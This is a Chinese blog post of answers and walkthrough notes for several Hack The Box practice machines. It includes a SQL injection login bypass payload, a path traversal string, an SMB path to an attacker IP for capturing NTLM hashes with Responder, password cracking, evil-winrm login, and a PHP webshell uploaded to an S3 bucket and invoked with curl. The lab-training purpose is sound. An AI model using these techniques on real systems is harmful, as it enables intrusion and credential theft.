Hack The Box 1基础(1-5)

最新推荐文章于 2024-09-09 09:47:53 发布
最新推荐文章于 2024-09-09 09:47:53 发布
阅读量950 收藏 20
点赞数 27
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22792465/article/details/137988696
版权
本文探讨了SQL注入攻击(A03:2021-Injection)以及如何通过StructuredQueryLanguage(SQL)进行安全漏洞探测,如使用ApacheHTTPd2.4.38中的目录遍历。文章涉及Web服务器配置、目录权限、404错误处理和WAF拦截,还展示了如何利用工具如DirBuster进行目录爆破,以及应对如Responder的网络渗透手段。同时,文中提到了PHP、AWSS3、Windows系统漏洞利用和密码破解技术。
摘要由CSDN通过智能技术生成

Apointment

答案:Structured Query Language(结构化查询语言)

答案:sql injection(sql注入)

答案:A03:2021-Injection

答案:Apache httpd 2.4.38 ((Debian))    使用-sV

答案:443

答案:directory

答案:404

(1xx信息响应表示服务器收到请求,需要请求者继续执行操作)

(2xx成功请求并处理)

(3xx重定向,需要进一步完成重定向后的内容的操作)

(4xx客户端错误请求包含错误语法或攻击参数waf拦截)

(5xx服务器错误,服务器处理用户请求时发生错误)

答案:dir(sudo gobuster dir -u host -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,js,bak)

答案:#

答案:congratulations

万能密码admin' #进入即可

Sequel

答案:3306

答案:MariaDB

答案:-u

答案:root(mysql -h 10.129.95.232 -P 3306 -u root -p)

答案:*

答案:;

答案:htb

答案:

Crocodile

答案:-sC

答案:vsftpd 3.0.3

答案:230

答案:anonymous

答案:get

答案:admin

答案:apache httpd 2.4.41

答案:-x(sudo gobuster dir -u host -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,js,bak)

答案:login.php

答案:从ftp中get出来的两个文件登录

Responder

答案:unika.htb

hosts解析

80端口有重定向可以通过修改hosts文件来解析其域名,添加IP地址和重定向跳转的域名,从而可以成功显示网站页面信息

 答案:php(抓包,指纹验证,nmap加参数扫描等都可以得到)

答案:page

答案:../../../../../../../../windows/system32/drivers/etc/hosts

答案://10.10.14.6/somefile

答案:New Technology LAN Manager

答案:-I

答案:john the ripper (John介绍及常用命令使用说明_john使用-CSDN博客

sudo responder -I tun0(使用responder来监听指定网卡,可以看到监听的网卡的信息)

内网渗透-Responder捕获Win哈希_responder 渗透-CSDN博客

通过访问指定的那个网卡IP地址来远程访问文件或者使用浏览器,responder就能抓取hash

进入responder目录下

用sudo ./DumpHash.py来导出抓取到的hash,然后使用john来破解hash得到密码

此时生成两个文件,DumpNTLMv1.txt和DumpNTLMv2.txt

答案:badminton

答案:5985

答案:

由于80端口页面没有flag查看5985端口搜索后发现,为远程管理

evil-winrm -i host  -p badminton -u administrator

成功连接

成功拿到flag

Three

答案:2

答案:thetoppers.htb(开80端口直接访问ip得到)

答案:/etc/hosts(responder关用到过)

答案:s3.thetoppers.htb

根据任务2可知域名thetoppers.htb

sudo gobuster vhost -u http://thetoppers.htb  -w /usr/share/wordlists/domain_dic.txt  

Web 扫描神器:Gobuster 保姆级教程(附链接)_gobuster参数-CSDN博客

答案:amazon S3

爆破出的子域名不可访问修改hosts通过解析

答案:awscli

答案:apt-get install awscli、aws configure

配置

tldr aws可查看工具用法 使用前更新 tldr --update

答案:AWS S3 LS

答案:php

在中使用终端节点 AWS CLI - AWS Command Line Interface (amazon.com)

答案:

通过工具访问

写个一句话木马上传shell

aws s3 --endpoint=http://s3.thetoppers.htb ls s3://thetoppers.htb 查看是否上传

因为get可以浏览器访问或者curl访问curl -v http://thetoppers.htb/shell.php?cmd=id

存在回显说明成功

一种是用参数直接搜索

一种是反弹shell (HTB_Three之aws s3拿shell_htb three-CSDN博客)

泷泷_
关注
Hack the box-Three
Ka_li12的博客
09-02 204
靶机地址。
Hack The Box新手教程
WRplayeR的博客
12-13 1300
ftp协议、ftp命令SMB协议、smbclient 命令redis数据库、redis-cli命令DRP远程桌面协议、xfreerdp工具命令gobuster的使用mongo数据库、mogon shell、NoSQLrsync协议、命令。
HackTheBox(黑客盒子)基础模块速通Crocodile篇
轻舟已过万重山
06-08 1013
黑客盒子的靶机和教程都挺不错的,更偏向于实战应用,和CTF这种形成鲜明对比,让学员逐步渗透进入一台客户机,方便学员构建渗透测试的思维体系,虽然我订阅的他们的VIP服务,但是免费版仍然有很多的客户机给新来的学员测试,网络接入也很自由,可以选择web端的虚拟化parrtos或者是给你一个ovpn的接入配置文件,让你直接接入黑客盒子实验室的网络
HTB_Three之aws s3拿shell
网络安全学习
08-27 2314
太久没打靶机又多了一个 又突破我的知识上限了
s3存储容器与awscli的交互
山兔的博客
11-02 999
通常,不同的子域将具有不同的IP地址,因此当我们的系统查找子域时,它会获取处理该应用程序的服务器的地址。因此,我们可以尝试将 PHP shell 文件上传到s3存储桶,因为它已上传到Webroot目录我们可以在浏览器中访问此网页,而浏览器又将执行此文件,我们将实现远程代码执行。有不同的枚举工具可用于此目的,如gobuster,wfuzz等等,在撰写本文时,我们将使用以下命令在对子域枚举的时候。我们看到文件index.php,.htaccess和一个名为images的目录在指定的存储桶中。
Hack The Box 2基础(1-4)
qq_22792465的博客
04-22 715
可以看到cat路径的执行文件当id不符则找不到不执行,并且当执行此文件时有root权限调用的cat命令,root直接调用是调用的cat环境遍历中的cat,则可以构造恶意cat将这个cat设置成环境遍历,使其root通过bugtracker可执行文件进行调用执行恶意cat。sudo -l后发现有vi编辑器的权限那么就用vi编辑器提权,又因为后门有conf文件所以直接向其文件写入 :!答案:--os-shell(使用os-shell需要绝对路径、root权限、secure_file_pirv无限制)
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
在这个领域,两个知名的在线平台是Hackthebox和Vulnhub,它们提供虚拟环境供用户实践和提升渗透测试技能。这份PDF文档作者Joas Antonio分享了一些初学者在接触这些平台时可能会发现有用的技巧和策略。 首先,对于...
Hack The Box-Crocodile
ffff5的博客
12-16 403
Hack The Box基础靶机Crocodile通关记录!
Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程
技术分享
07-24 1496
Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程
[网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识
杨秀璋的专栏
01-09 2万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,而且用户注册该网站时需要绕过关卡并获取邀请码,涉及审查元素、base64解密、发送post请求等操作,挺有意思的。这是一篇基础性文章,将讲述注册过程、遇到的难点及入门案例,希望对您有所帮助。
Hack The Box - Three(新手友好)
weixin_45793727的博客
08-12 3747
thetoppers.htb应该是域名,把域名和IP加到hosts文件中,tee命令的作用就是读取标准输入内容,将读取到的内容数据写入到标准输出和文件中。看看s3,s3是亚马逊云存储的简单存储服务,全程是Simple Storage Service。如果成功的话可以看到我们监听的页面,如果没反弹成功可以看看10.10.16.60:8090是否有我们的shell.sh文件。我们通过命令执行shell,curl执行bash脚本反弹shell来实现命令行交互。生成bash一句话shell.sh。......
Tier 1 - Three
qq_21116067的博客
10-01 2783
Hack The Box - Tier 1 - Three
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
spring事务详细讲解-深入浅出
小电玩
09-08 515
Spring 事务是本身就是对数据库的事务的支持,没有数据库的事务 Spring 是本身无法实现事务的。Spring只提供了统一事务管理接口,具体的实现还是由各数据库自己实现。在使用 Spring 事务时,可以通过注解或编程方式将需要进行事务管理的方法和代码块标记为事务性操作,当这些操作被执行时,Spring 会负责开启时根据当前环境中设置的隔离级别,调整数据库隔离级别。
【提效工具】AI工作流的1-10个实际落地场景
最新发布
万物皆有灵
09-09 1176
在这个快速发展的数字时代,人工智能(AI)正在以惊人的速度改变我们的工作方式。无论你是开发者、教育工作者还是内容创作者,AI工作流提示词助手都能为你提供无与伦比的支持。今天,我们将深入探讨,20个实际落地场景,帮助你更好地理解如何利用这些工具提升工作效率和创造力。💡。
币安/OK现货合约量化系统APP开发
I592O929783的博客
09-08 595
后端:考虑系统需要处理大量实时数据和高频交易的特点,选择高性能的编程语言和技术框架,如Python的Django或Flask框架,Java的Spring Boot等。用户交互界面:设计直观易用的用户交互界面,包括交易界面、策略配置界面、风险管理界面等,方便用户进行交易操作、策略配置和风险管理。市场数据接入:开发市场数据接入模块,从币安等交易所或数据服务商获取实时的市场数据,包括行情数据、订单簿数据、成交数据等。前端:选择适合开发复杂界面的前端框架,如React、Vue.js等,以提供用户友好的交互界面。
问题: java.sql.SQLException:The server time zone value ‘�й���׼ʱ��‘
m0_74293254的博客
09-08 351
译文: Mybatis Plus服务器时区值“h”无法识别或表示多个时区。如果希望利用时区支持,必须配置服务器或JDBC驱动程序(通过serverTimezone配置属性)以使用更具体的时区值。出现上述问题后,一般为数据库连接的url地址配置中,没有配置时区serverTimezone=UTC或配置错误,修改下即可。
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 Reel虚拟机是以恶意软件传播为主题的,这是一个很常见但危险的网络攻击。在解决这个靶场时,你需要进行全面的信息搜集,发现可能的漏洞,并利用这些漏洞来控制系统。你还需要进行各种网络嗅探和流量分析操作,以便找到系统中的隐藏服务和登录凭证。 在攻击过程中,你需要利用各种漏洞包括未经授权的访问和远程执行代码等。还需要理解和使用不同的入侵技术,例如命令注入和文件上传等。此外,你可能还需要对恶意软件的分析和行为进行深入研究,以了解其运行机制。 HackTheBox - Reel不仅测试了你的渗透测试技能,而且还促使你加强对恶意软件攻击和防护的了解。同时,这个靶场还有很多高级技术和技巧需要掌握。通过挑战这样的虚拟机,你可以提高你的安全意识和技能,以应对更复杂和高级的网络攻击。 总之,HackTheBox - Reel是一个非常有挑战性的虚拟机靶场,通过攻击和渗透测试,你将提高你的安全技能,并了解到如何防范和对抗恶意软件传播。这是一个很好的方式来锻炼和提升你的网络安全技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值